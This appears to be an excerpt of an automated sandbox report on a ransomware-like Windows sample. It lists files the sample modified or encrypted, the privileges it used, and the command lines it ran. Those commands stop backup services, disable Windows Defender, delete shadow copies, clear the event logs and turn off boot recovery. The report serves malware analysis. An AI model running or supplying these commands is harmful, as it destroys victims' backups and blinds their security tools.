| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\auxbase.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_HgAAAB4AAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\js\startup.js | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_CgAAAAoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\uz-Latn-UZ\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\Json\EmailAction-AdaptiveCard.json | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-20_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_EgAAABIAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KAAAACgAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshe.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\13.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KgAAACoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_BgAAAAYAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe
"C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_17102" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_17102" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_17102" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 72.21.81.240:80 | | tcp |
| US | 72.21.81.240:80 | | tcp |
Files
memory/2972-130-0x0000027BF0D40000-0x0000027BF0D62000-memory.dmp
memory/2972-131-0x0000027BD7C70000-0x0000027BD8731000-memory.dmp
memory/2972-132-0x0000027BF0CC8000-0x0000027BF0CC9000-memory.dmp
memory/2972-133-0x0000027BF0CC0000-0x0000027BF0CC2000-memory.dmp
